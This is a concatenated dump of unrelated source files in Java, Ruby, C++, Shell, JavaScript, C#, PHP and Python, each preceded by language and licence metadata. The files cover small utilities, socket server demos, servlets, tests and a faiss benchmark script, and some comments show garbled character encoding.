return new TTriangle(triangle.AB * k, triangle.AC * k,
triangle.BC * k);
}
}
}
|
Java
|
UTF-8
| 275 | 2.140625 | 2 |
[] |
no_license
|
package com.lsheep.common.core.utils;
public abstract class StringUtils extends org.springframework.util.StringUtils {
public static String captureName(String name) {
char[] character = name.toCharArray();
character[0] -= 32;
return String.valueOf(character);
}
}
|
Ruby
|
GB18030
| 1,496 | 2.609375 | 3 |
[] |
no_license
|
require 'socket'
############################## run a single TCP session and then stop
# A simple TCP server may look like:
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
############################## loop so the server keeps accepting new clients
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# loop do
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
# end
############################## loop inside a thread so the server keeps accepting new clients
server_ip = "50.50.50.55"
port = 2001
server = TCPServer.new server_ip, port # Server bind to port 2000
t = Thread.new(server) do |server|
loop do
client = server.accept # Wait for a client to connect
client.puts "Hello !"
client.puts "Time is #{Time.now}"
client.close
end
end
t.join
####################### handle each client in its own thread
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# loop do
# Thread.new(server) do |server|
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
# end
# end
|
Java
|
UTF-8
| 4,507 | 2.46875 | 2 |
[] |
no_license
|
package cn.newgxu.bbs.web.servlet;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import cn.newgxu.bbs.common.util.Util;
import cn.newgxu.bbs.service.UserService;
/**
*
* @author hjc
* @since 4.0.0
* @version $Revision 1.1$
*/
@SuppressWarnings("serial")
public class AjaxHandlerServlet extends HttpServlet {
private UserService userService = (UserService) Util.getBean("userService");
public void execute(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
String path = request.getServletPath();
path = path.substring(0, path.lastIndexOf("."));
String handler = getHandlerMapping().get(path);
if (handler == null) {
response.sendError(HttpServletResponse.SC_NOT_FOUND,
"Unknown path:" + path);
return;
}
try {
response.setHeader("Cache-Control", "no-cache");
Class<?>[] parameterTypes = new Class[] { HttpServletRequest.class,
HttpServletResponse.class };
Method method = this.getClass().getDeclaredMethod(handler,
parameterTypes);
method.invoke(this, request, response);
} catch (Exception e) {
e.printStackTrace();
throw new ServletException(e);
}
}
protected Map<String, String> getHandlerMapping() {
Map<String, String> handlers = new HashMap<String, String>();
handlers.put("/accounts/validateNickName", "validateNickName");
handlers.put("/accounts/validateLoginName", "validateLoginName");
handlers.put("/request/get", "handleGetParameters");
handlers.put("/request/post", "handlePostParameters");
return handlers;
}
protected void validateLoginName(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/plain");
PrintWriter out = response.getWriter();
String userName = request.getParameter("userName");
boolean exist = false;
try {
exist = userService.isUserNameInUser(userName);
} catch (Exception e) {
e.printStackTrace();
// throw new ServletException(e);
}
if (exist) {
out.print("inuse");
} else {
out.print("good name");
}
out.close();
}
protected void validateNickName(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/plain");
PrintWriter out = response.getWriter();
String nick = request.getParameter("nick");
boolean exist = false;
try {
exist = userService.isNickNameInUser(nick);
} catch (Exception e) {
e.printStackTrace();
out.print("good name");
out.close();
}
if (exist) {
out.print("inuse");
} else {
out.print("good name");
}
out.close();
}
protected void handleGetParameters(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/html;charset=gbk");
PrintWriter out = response.getWriter();
String name = request.getParameter("name");
String gender = request.getParameter("gender");
String greetings = "尊敬的" + name;
if (gender.equals("m")) {
greetings += "先生";
} else {
greetings += "女士";
}
out.print(greetings);
out.print(",您好!");
out.close();
}
protected void handlePostParameters(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/html;charset=gbk");
PrintWriter out = response.getWriter();
request.setCharacterEncoding("utf-8");
String name = request.getParameter("name");
String gender = request.getParameter("gender");
String greetings = "尊敬的" + name;
if (gender.equals("m")) {
greetings += "先生";
} else {
greetings += "女士";
}
out.print(greetings);
out.print(",您好!");
out.close();
}
public void setUserService(UserService userService) {
this.userService = userService;
}
public void doGet(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
execute(request, response);
}
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
execute(request, response);
}
}
|
Java
|
UTF-8
| 1,571 | 2.953125 | 3 |
[] |
no_license
|
package phase1.module4.Work.work03.server;
import phase1.module4.Work.ServerThread;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.*;
public class Server {
public static Map<String,Socket> sockets = new HashMap<>();
public static void main(String[] args) {
ServerSocket ss = null;
Socket s = null;
BufferedReader br = null;
try {
ss = new ServerSocket(6666);
while (true) {
System.out.println("等待客户端的请求连接...");
s = ss.accept();
br = new BufferedReader(new InputStreamReader(s.getInputStream()));
String name = br.readLine();
if( name.contains("^&*)8947!@!")){
sockets.put(name.substring("^&*)8947!@!".length()),s);
}
System.out.println(name + "连接成功!");
new Thread(new ServerRunnable(s)).start();
}
} catch (IOException e) {
e.printStackTrace();
} finally {
if(null != s){
try {
s.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if(null != ss){
try {
ss.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
|
C++
|
GB18030
| 268 | 3.25 | 3 |
[] |
no_license
|
#pragma once
template <typename T>
void Vector<T> ::copyFrom(T const* A,Rank lo, Rank hi){
// 2¿ռ
_elem = new T[_capacity = 2 * (hi - lo)];
// ģ
_size = 0;
// һԪ
while(lo<hi){
_elem[_size++] = A[lo++];
}
}
|
Shell
|
UTF-8
| 1,026 | 3.546875 | 4 |
[] |
no_license
|
#!/bin/bash
#This script runs a snoutscan benchmark on the data at $1 using different indicies and prints a
# tsv-like output with the resuling accuracy and time
# set -x
dataDir="$1"
#This is a list of strings that fully define a faiss index:
indexDefinitions=( "Flat"
"IVF1024,Flat"
"IVF2048,Flat"
"IVF4096,Flat"
"PQ32"
"PCA80,Flat"
"IVF4096,PQ8+16"
"IVF4096,PQ32"
"IMI2x8,PQ32"
"IMI2x8,PQ8+16"
"OPQ16_64,IMI2x8,PQ8+16")
echo -e "indexDefinition\taccuracy\truntimeSec"
for index in ${indexDefinitions[*]}
do
timeBeforeSec=$(date +"%s")
accuracy=$(snoutScan.py -i "$index" "$dataDir" 2>/dev/null | grep 'Proportion of subject' | sed 's/.*: //g')
timeAfterSec=$(date +"%s")
timeBetweenSec=$( echo "$timeAfterSec - $timeBeforeSec" | bc )
echo -e "$index\t$accuracy\t$timeBetweenSec"
done
|
Ruby
|
UTF-8
| 230 | 2.625 | 3 |
[] |
no_license
|
require "fileutils"
include FileUtils::Verbose
def run(a, *b, **c)
pp [a, b, c]
end
run 10
run 10, 20
run 10, 20, 30, 40
run 10, 20, 30, 40, [50, 60]
run 10, 20, 30, 40, name: "akshay", age: 29
run 10, name: "akshay", age: 29
|
JavaScript
|
UTF-8
| 1,008 | 3.34375 | 3 |
[] |
no_license
|
// your code here!
var normalizeText = function(text){
return text.toLowerCase().trim();
}
var tokenizer = function(text){
    return text.replace(/\r?\n|\r/g, '').split(' ');
}
var countAvgWordLength = function(token){
var str = token.join("");
return (str.length/token.length).toFixed(2);
}
var uniqueWordCount = function(token){
var match = [];
for(var i = 0; i < token.length; i++){
if(match.indexOf(token[i]) === -1){
match.push(token[i]);
}
}
return match.length
}
var renderResults = function(text){
var tokens = tokenizer(normalizeText(text));
$('.hidden').removeClass();
$('dl').find('.js-word-count').text(tokens.length);
$('dl').find('.js-unique-word').text(uniqueWordCount(tokens));
$('dl').find('.js-avg-length').text(countAvgWordLength(tokens));
}
var getSubmit = function(){
$('#user-text').submit(function(event){
event.preventDefault();
var str = $('.js-user-text').val();
console.log(str);
renderResults(str);
})
}
$(function(){
getSubmit();
})
|
C#
|
UTF-8
| 1,774 | 2.578125 | 3 |
[] |
no_license
|
using System;
using System.IO;
using System.Text.Json;
namespace Overstag.Core
{
public class Credentials
{
public string mailUsername { get; set; }
public string mailPass { get; set; }
public string mySqlConnectionString { get; set; }
public string msSqlConnectionString { get; set; }
public string msSqlLiveCString { get; set; }
public string mySqlLiveCString { get; set; }
public string mollieApiToken { get; set; }
public string msSqlDebugCString { get; set; }
/// <summary>
/// Get credentials from file on server
/// </summary>
/// <returns>Credentials object</returns>
public Credentials Get()
{
Console.WriteLine("[LOG] Reading credentials from file...");
return JsonSerializer.Deserialize<Credentials>(File.ReadAllText(Path.Combine(Environment.CurrentDirectory, "credentials.json")));
}
}
public static class General
{
public static bool isDebug { get { return IsDebug(); } }
private static Credentials _credentials;
public static Credentials Credentials {
get {
if (_credentials == null)
_credentials = new Credentials().Get();
return _credentials;
}
}
public static bool DateIsPassed(DateTime check)
=> check < DateTime.Now;
public static int getAge(DateTime bd)
=> (new DateTime(DateTime.Now.Year, bd.Month, bd.Day) > DateTime.Now ? (DateTime.Now.Year - bd.Year)-1 : (DateTime.Now.Year - bd.Year));
private static bool IsDebug()
{
#if DEBUG
return true;
#else
return false;
#endif
}
}
}
|
PHP
|
UTF-8
| 2,707 | 2.84375 | 3 |
[
"AGPL-3.0-only",
"MIT",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"GPL-3.0-only"
] |
permissive
|
<?php
declare(strict_types=1);
/*
* The MIT License (MIT)
*
* Copyright (c) 2018 Spomky-Labs
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
namespace CBOR\OtherObject;
use Assert\Assertion;
use CBOR\OtherObject as Base;
use InvalidArgumentException;
final class DoublePrecisionFloatObject extends Base
{
public static function supportedAdditionalInformation(): array
{
return [27];
}
public static function createFromLoadedData(int $additionalInformation, ?string $data): Base
{
return new self($additionalInformation, $data);
}
/**
* @return DoublePrecisionFloatObject
*/
public static function create(string $value): self
{
if (8 !== mb_strlen($value, '8bit')) {
throw new InvalidArgumentException('The value is not a valid double precision floating point');
}
return new self(27, $value);
}
public function getNormalizedData(bool $ignoreTags = false)
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_init(bin2hex($data), 16);
$exp = gmp_intval($this->bitwiseAnd($this->rightShift($single, 52), gmp_init('7ff', 16)));
$mant = gmp_intval($this->bitwiseAnd($single, gmp_init('fffffffffffff', 16)));
$sign = gmp_intval($this->rightShift($single, 63));
if (0 === $exp) {
$val = $mant * 2 ** (-(1022 + 52));
} elseif (0b11111111111 !== $exp) {
$val = ($mant + (1 << 52)) * 2 ** ($exp - (1023 + 52));
} else {
$val = 0 === $mant ? INF : NAN;
}
return 1 === $sign ? -$val : $val;
}
public function getExponent(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return ($single >> 52) & 0x7ff;
}
public function getMantissa(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return $single & 0x7fffff;
}
public function getSign(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return 1 === ($single >> 63) ? -1 : 1;
}
private function rightShift(\GMP $number, int $positions): \GMP
{
return gmp_div($number, gmp_pow(gmp_init(2, 10), $positions));
}
private function bitwiseAnd(\GMP $first, \GMP $other): \GMP
{
return gmp_and($first, $other);
}
}
|
Java
|
UTF-8
| 1,765 | 1.671875 | 2 |
[] |
no_license
|
// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3) braces deadcode fieldsfirst
package net.minecraft.src;
// Referenced classes of package net.minecraft.src:
// RenderLiving, EntityPig, ModelBase, EntityLiving,
// Entity
public class RenderPig extends RenderLiving
{
public RenderPig(ModelBase p_i3197_1_, ModelBase p_i3197_2_, float p_i3197_3_)
{
super(p_i3197_1_, p_i3197_3_);
func_77042_a(p_i3197_2_);
}
protected int func_77099_a(EntityPig p_77099_1_, int p_77099_2_, float p_77099_3_)
{
func_76985_a("/mob/saddle.png");
return p_77099_2_ != 0 || !p_77099_1_.func_70901_n() ? -1 : 1;
}
public void func_77098_a(EntityPig p_77098_1_, double p_77098_2_, double p_77098_4_, double p_77098_6_,
float p_77098_8_, float p_77098_9_)
{
super.func_77031_a(p_77098_1_, p_77098_2_, p_77098_4_, p_77098_6_, p_77098_8_, p_77098_9_);
}
protected int func_77032_a(EntityLiving p_77032_1_, int p_77032_2_, float p_77032_3_)
{
return func_77099_a((EntityPig)p_77032_1_, p_77032_2_, p_77032_3_);
}
public void func_77031_a(EntityLiving p_77031_1_, double p_77031_2_, double p_77031_4_, double p_77031_6_,
float p_77031_8_, float p_77031_9_)
{
func_77098_a((EntityPig)p_77031_1_, p_77031_2_, p_77031_4_, p_77031_6_, p_77031_8_, p_77031_9_);
}
public void func_76986_a(Entity p_76986_1_, double p_76986_2_, double p_76986_4_, double p_76986_6_,
float p_76986_8_, float p_76986_9_)
{
func_77098_a((EntityPig)p_76986_1_, p_76986_2_, p_76986_4_, p_76986_6_, p_76986_8_, p_76986_9_);
}
}
|
PHP
|
UTF-8
| 694 | 2.53125 | 3 |
[] |
no_license
|
<?php
namespace Craft;
class DirectoryContents_FileModel extends BaseComponentModel
{
public function __toString()
{
return $this->path;
}
protected function defineAttributes()
{
return array(
'name' => AttributeType::String,
'niceName' => AttributeType::String,
'fileName' => AttributeType::String,
'path' => AttributeType::String,
'parentFolder' => AttributeType::String,
'niceParentFolder' => AttributeType::String,
'extension' => AttributeType::String,
'size' => AttributeType::Number,
'created' => AttributeType::Number,
'modified' => AttributeType::Number,
);
}
}
|
Java
|
UTF-8
| 3,443 | 2.234375 | 2 |
[] |
no_license
|
package pl.edu.agh.speedgame;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.powermock.core.classloader.annotations.PrepareForTest;
import org.powermock.modules.junit4.PowerMockRunner;
import pl.edu.agh.speedgame.dao.OurSessionReplacement;
import pl.edu.agh.speedgame.dao.SessionFactorySingleton;
import pl.edu.agh.speedgame.dto.User;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.PrintWriter;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
import static org.powermock.api.mockito.PowerMockito.*;
@RunWith(PowerMockRunner.class)
@PrepareForTest({SessionFactorySingleton.class, OurSessionReplacement.class})
public class LoginServletTest {
private HttpServletRequest request;
private HttpServletResponse response;
private OurSessionReplacement hibernateSession;
private HttpSession httpSession;
private User user;
@Before
public void setUp() {
request = createLoginRequestMock();
hibernateSession = createOurSessionReplacementMock();
httpSession = mock(HttpSession.class);
when(request.getSession()).thenReturn(httpSession);
user = new User.UserBuilder().login("bob").password("ala").email("ccc").avatar("lal").ring("obo").build();
when(hibernateSession.get(User.class, "bob")).thenReturn(user);
response = mock(HttpServletResponse.class);
}
@Test
public void testLogin() throws Exception {
// given
// standard setup
// when
new LoginServlet().doPost(request, response);
// then
verify(httpSession).setAttribute(eq("user"), eq(user));
verify(response).sendRedirect("/jsp/logged.jsp");
}
@Test
public void testExists() throws Exception {
// given
when(request.getParameter("exists")).thenReturn("true");
PrintWriter printWriterMock = mock(PrintWriter.class);
when(response.getWriter()).thenReturn(printWriterMock);
JSONObject object = new JSONObject();
object.put("login", user.getLogin());
object.put("email", user.getEmail());
object.put("avatar", user.getAvatar());
object.put("ring", user.getRing());
// when
new LoginServlet().doPost(request, response);
// then
verify(response).setContentType("application/json");
verify(printWriterMock).write(object.toString());
}
private OurSessionReplacement createOurSessionReplacementMock() {
SessionFactorySingleton factoryMock = mock(SessionFactorySingleton.class);
mockStatic(SessionFactorySingleton.class);
when(SessionFactorySingleton.getInstance()).thenReturn(factoryMock);
OurSessionReplacement hibernateSession = mock(OurSessionReplacement.class);
when(factoryMock.createSessionReplacement()).thenReturn(hibernateSession);
return hibernateSession;
}
private HttpServletRequest createLoginRequestMock() {
HttpServletRequest request = mock(HttpServletRequest.class);
when(request.getParameter("login")).thenReturn("bob");
when(request.getParameter("password")).thenReturn("ala");
return request;
}
}
|
Java
|
UTF-8
| 974 | 2.703125 | 3 |
[] |
no_license
|
package com.rmi.distance;
import java.util.ArrayList;
import java.util.List;
public class MapDistance {
private static double EARTH_RADIUS = 6378.137;
private static double rad(double d) {
return d * Math.PI / 180.0;
}
public static void main(String[] args) {
/*Double lat1 = 30.470476;
Double lng1 = 114.321763;
Double lat2 = 30.473861;
Double lng2 = 119.325169;
double radLat1 = rad(lat1);
double radLat2 = rad(lat2);
double difference = radLat1 - radLat2;
double mdifference = rad(lng1) - rad(lng2);
double distance = 2 * Math.asin(Math.sqrt(Math.pow(Math.sin(difference / 2), 2)
+ Math.cos(radLat1) * Math.cos(radLat2)
* Math.pow(Math.sin(mdifference / 2), 2)));
distance = distance * EARTH_RADIUS * 1000;
System.out.println(distance<300*1.1);*/
List<String> all = new ArrayList<>();
all.addAll(null);
}
}
|
Java
|
UTF-8
| 5,457 | 1.71875 | 2 |
[
"Apache-2.0"
] |
permissive
|
package com.capsilon.automation.aus.dto;
import com.fasterxml.jackson.annotation.*;
import java.util.HashMap;
import java.util.Map;
@JsonInclude(JsonInclude.Include.NON_NULL)
@JsonPropertyOrder({
"first_pand_iqualifying",
"negative_net_rental",
"second_pand_i",
"subj_neg_cash_flow",
"hazard_insurance",
"all_other_payments",
"taxes",
"total_expense_payment",
"mortgage_insurance",
"hoa_fees",
"present_principal_housing_payment",
"other",
"total_housing_payment"
})
public class ProposedMonthlyPayment {
@JsonProperty("first_pand_iqualifying")
private Double firstPandIqualifying;
@JsonProperty("negative_net_rental")
private Double negativeNetRental;
@JsonProperty("second_pand_i")
private Double secondPandI;
@JsonProperty("subj_neg_cash_flow")
private Double subjNegCashFlow;
@JsonProperty("hazard_insurance")
private Double hazardInsurance;
@JsonProperty("all_other_payments")
private Double allOtherPayments;
@JsonProperty("taxes")
private Double taxes;
@JsonProperty("total_expense_payment")
private Double totalExpensePayment;
@JsonProperty("mortgage_insurance")
private Double mortgageInsurance;
@JsonProperty("hoa_fees")
private Double hoaFees;
@JsonProperty("present_principal_housing_payment")
private Double presentPrincipalHousingPayment;
@JsonProperty("other")
private Double other;
@JsonProperty("total_housing_payment")
private Double totalHousingPayment;
@JsonIgnore
private Map<String, Object> additionalProperties = new HashMap<>();
@JsonProperty("first_pand_iqualifying")
public Double getFirstPandIqualifying() {
return firstPandIqualifying;
}
@JsonProperty("first_pand_iqualifying")
public void setFirstPandIqualifying(Double firstPandIqualifying) {
this.firstPandIqualifying = firstPandIqualifying;
}
@JsonProperty("negative_net_rental")
public Double getNegativeNetRental() {
return negativeNetRental;
}
@JsonProperty("negative_net_rental")
public void setNegativeNetRental(Double negativeNetRental) {
this.negativeNetRental = negativeNetRental;
}
@JsonProperty("second_pand_i")
public Double getSecondPandI() {
return secondPandI;
}
@JsonProperty("second_pand_i")
public void setSecondPandI(Double secondPandI) {
this.secondPandI = secondPandI;
}
@JsonProperty("subj_neg_cash_flow")
public Double getSubjNegCashFlow() {
return subjNegCashFlow;
}
@JsonProperty("subj_neg_cash_flow")
public void setSubjNegCashFlow(Double subjNegCashFlow) {
this.subjNegCashFlow = subjNegCashFlow;
}
@JsonProperty("hazard_insurance")
public Double getHazardInsurance() {
return hazardInsurance;
}
@JsonProperty("hazard_insurance")
public void setHazardInsurance(Double hazardInsurance) {
this.hazardInsurance = hazardInsurance;
}
@JsonProperty("all_other_payments")
public Double getAllOtherPayments() {
return allOtherPayments;
}
@JsonProperty("all_other_payments")
public void setAllOtherPayments(Double allOtherPayments) {
this.allOtherPayments = allOtherPayments;
}
@JsonProperty("taxes")
public Double getTaxes() {
return taxes;
}
@JsonProperty("taxes")
public void setTaxes(Double taxes) {
this.taxes = taxes;
}
@JsonProperty("total_expense_payment")
public Double getTotalExpensePayment() {
return totalExpensePayment;
}
@JsonProperty("total_expense_payment")
public void setTotalExpensePayment(Double totalExpensePayment) {
this.totalExpensePayment = totalExpensePayment;
}
@JsonProperty("mortgage_insurance")
public Double getMortgageInsurance() {
return mortgageInsurance;
}
@JsonProperty("mortgage_insurance")
public void setMortgageInsurance(Double mortgageInsurance) {
this.mortgageInsurance = mortgageInsurance;
}
@JsonProperty("hoa_fees")
public Double getHoaFees() {
return hoaFees;
}
@JsonProperty("hoa_fees")
public void setHoaFees(Double hoaFees) {
this.hoaFees = hoaFees;
}
@JsonProperty("present_principal_housing_payment")
public Double getPresentPrincipalHousingPayment() {
return presentPrincipalHousingPayment;
}
@JsonProperty("present_principal_housing_payment")
public void setPresentPrincipalHousingPayment(Double presentPrincipalHousingPayment) {
this.presentPrincipalHousingPayment = presentPrincipalHousingPayment;
}
@JsonProperty("other")
public Double getOther() {
return other;
}
@JsonProperty("other")
public void setOther(Double other) {
this.other = other;
}
@JsonProperty("total_housing_payment")
public Double getTotalHousingPayment() {
return totalHousingPayment;
}
@JsonProperty("total_housing_payment")
public void setTotalHousingPayment(Double totalHousingPayment) {
this.totalHousingPayment = totalHousingPayment;
}
@JsonAnyGetter
public Map<String, Object> getAdditionalProperties() {
return this.additionalProperties;
}
@JsonAnySetter
public void setAdditionalProperty(String name, Object value) {
this.additionalProperties.put(name, value);
}
}
|
Python
|
UTF-8
| 296 | 2.859375 | 3 |
[] |
no_license
|
import pytest
from solutions.p3 import largest_prime_factor
def test_1():
assert largest_prime_factor(2) == 2
def test_2():
assert largest_prime_factor(25) == 5
def test_4():
assert largest_prime_factor(7833) == 373
def test_3():
assert largest_prime_factor(13195) == 29
|
JavaScript
|
UTF-8
| 797 | 2.703125 | 3 |
[] |
no_license
|
const Engine = Matter.Engine;
const World = Matter.World;
const Bodies = Matter.Bodies;
const Body = Matter.Body;
var papper;
var ground;
var box1,box2,box3;
function preload()
{
}
function setup() {
createCanvas(800, 700);
engine = Engine.create();
world = engine.world;
//Create the Bodies Here.
papper=new Papper(50,600);
box1=new Box(600,600,20,100);
box2=new Box(750,600,20,100);
box3=new Box(670,630,200,20);
ground=new Ground(400,650,800,20);
Engine.run(engine);
}
function draw() {
rectMode(CENTER);
background(0);
box1. display();
box2.display();
box3.display();
ground.display();
papper.display();
}
function keyPressed() {
if (keyCode === UP_ARROW) {
Matter.Body.applyForce(papper.body,papper.body.position,{x:50,y:-85})
}
}
|
Java
|
UTF-8
| 5,555 | 2.171875 | 2 |
[] |
no_license
|
/*
* Copyright (c) 2002-2017 "Neo Technology,"
* Network Engine for Objects in Lund AB [http://neotechnology.com]
*
* This file is part of Neo4j.
*
* Neo4j is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.neo4j.server.rest.repr;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedList;
import java.util.List;
import org.neo4j.graphdb.ConstraintViolationException;
import org.neo4j.helpers.collection.IterableWrapper;
import org.neo4j.kernel.api.exceptions.Status;
import org.neo4j.server.rest.transactional.error.Neo4jError;
public class ExceptionRepresentation extends MappingRepresentation
{
private final List<Neo4jError> errors = new LinkedList<>();
private boolean includeLegacyRepresentation;
public ExceptionRepresentation( Throwable exception )
{
this( exception, true );
}
public ExceptionRepresentation( Throwable exception, boolean includeLegacyRepresentation )
{
super( RepresentationType.EXCEPTION );
this.errors.add( new Neo4jError( statusCode( exception ), exception ) );
this.includeLegacyRepresentation = includeLegacyRepresentation;
}
public ExceptionRepresentation( Neo4jError ... errors )
{
super( RepresentationType.EXCEPTION );
for ( Neo4jError exception : errors )
{
this.errors.add( exception );
}
}
@Override
protected void serialize( MappingSerializer serializer )
{
// For legacy reasons, this actually serializes into two separate formats - the old format, which simply
// serializes a single exception, and the new format which serializes multiple errors and provides simple
// status codes.
if ( includeLegacyRepresentation )
{
renderWithLegacyFormat( errors.get( 0 ).cause(), serializer );
}
renderWithStatusCodeFormat( serializer );
}
private void renderWithStatusCodeFormat( MappingSerializer serializer )
{
serializer.putList( "errors", ErrorEntryRepresentation.list( errors ) );
}
private void renderWithLegacyFormat( Throwable exception, MappingSerializer serializer )
{
String message = exception.getMessage();
if ( message != null )
{
serializer.putString( "message", message );
}
serializer.putString( "exception", exception.getClass().getSimpleName() );
serializer.putString( "fullname", exception.getClass().getName() );
StackTraceElement[] trace = exception.getStackTrace();
if ( trace != null )
{
Collection<String> lines = new ArrayList<String>( trace.length );
for ( StackTraceElement element : trace )
{
if ( element.toString().matches( ".*(jetty|jersey|sun\\.reflect|mortbay|javax\\.servlet).*" ) )
{
continue;
}
lines.add( element.toString() );
}
serializer.putList( "stackTrace", ListRepresentation.string( lines ) );
}
Throwable cause = exception.getCause();
if ( cause != null )
{
serializer.putMapping( "cause", new ExceptionRepresentation( cause ) );
}
}
private static class ErrorEntryRepresentation extends MappingRepresentation
{
private final Neo4jError error;
ErrorEntryRepresentation( Neo4jError error )
{
super( "error-entry" );
this.error = error;
}
@Override
protected void serialize( MappingSerializer serializer )
{
serializer.putString( "code", error.status().code().serialize() );
serializer.putString( "message", error.getMessage() );
if ( error.shouldSerializeStackTrace() )
{
serializer.putString( "stackTrace", error.getStackTraceAsString() );
}
}
public static ListRepresentation list( Collection<Neo4jError> errors )
{
return new ListRepresentation( "error-list", new IterableWrapper<ErrorEntryRepresentation, Neo4jError>( errors )
{
@Override
protected ErrorEntryRepresentation underlyingObjectToObject( Neo4jError error )
{
return new ErrorEntryRepresentation( error );
}
} );
}
}
private static Status statusCode( Throwable current )
{
while ( current != null )
{
if ( current instanceof Status.HasStatus )
{
return ((Status.HasStatus) current).status();
}
if ( current instanceof ConstraintViolationException )
{
return Status.Schema.ConstraintValidationFailed;
}
current = current.getCause();
}
return Status.General.UnknownError;
}
}
|
JavaScript
|
UTF-8
| 354 | 3.453125 | 3 |
[] |
no_license
|
/**
* IIFE ('iffy')
 * Immediately invoked function expression
*
* Immediately = right away
* Invoked = run
* Function = ...function...
* Expression = ...expression...
*
* A function that we write and run at the same time
*/
(function () {
window.addEventListener('load', function () {
console.log('page is loaded')
});
}());
|
Python
|
UTF-8
| 204 | 2.859375 | 3 |
[
"Apache-2.0"
] |
permissive
|
class contador():
def __init__(self,recuento):
self.recuento = recuento
def incrementar(self):
        self.recuento += 1
def decrementar(self):
        self.recuento -= 1
c = contador(0)
|
Ruby
|
UTF-8
| 2,501 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
class StateWorkflow::StateDefinitions
#Specify the name of the var/method to be available in validations for reference the thing on which these state apply
def self.these_are_states_for(stateful_object_name)
self.class_eval do
cattr_accessor :stateful_object_name
end
self.stateful_object_name = stateful_object_name
end
#Specify the intial state that should be set on new instances of this object (State is expected to be required)
def self.initial_state(initial_state_name)
self.class_eval do
cattr_accessor :initial_state_name
end
self.initial_state_name = initial_state_name
end
def self.run_includes(on_class)
on_class.class_eval do
class << self
include StateWorkflow::StatefulObjectClassMethods
end
include StateWorkflow::StatefulObjectInstanceMethods
end
end
def self.definition_context_class
StateWorkflow::State::DefinitionContext
end
#Define a new state
def self.state(state_name, human_name = nil, &block)
human_name_proc = nil
if human_name
human_name_proc = Proc.new{ human_name.to_s }
elsif self.respond_to?(:display_proc_for_state_name)
human_name_proc = Proc.new{ self.display_proc_for_state_name.call(state_name).to_s }
else
human_name_proc = Proc.new{ state_name.to_s.humanize }
end
self.class_eval do
cattr_accessor :all_states
cattr_accessor :states_in_order
end
self.all_states ||= {}
self.states_in_order ||= []
new_state = StateWorkflow::State.new(state_name.to_sym, human_name_proc, self)
context = self.definition_context_class.new(new_state, @just_defined_state)
context.instance_eval(&block)
context.apply_to_state_definition!
self.all_states[state_name.to_sym] = new_state
self.states_in_order << new_state
@just_defined_state = new_state
end
def self.non_workflow_state(state_name, human_name = nil, &block)
state(state_name, human_name, &block)
@just_defined_state.previous_state = nil
@just_defined_state.next_state = nil
@just_defined_state = nil
end
def self.display_name_for_state(&block)
self.class_eval do
cattr_accessor :display_proc_for_state_name
end
self.display_proc_for_state_name = block
end
def self.compose_validation_error_as(&block)
self.class_eval do
cattr_accessor :compose_proc_for_validation_errors
end
self.compose_proc_for_validation_errors = block
end
end
|
JavaScript
|
UTF-8
| 1,562 | 2.546875 | 3 |
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
//
// MonoHMD.js
//
// Created by Chris Collins on 10/5/15
// Copyright 2015 High Fidelity, Inc.
//
// This script allows you to switch between mono and stereo mode within the HMD.
// It will add adition menu to Tools called "IPD".
//
// Distributed under the Apache License, Version 2.0.
// See the accompanying file LICENSE or http://www.apache.org/licenses/LICENSE-2.0.html
function setupipdMenu() {
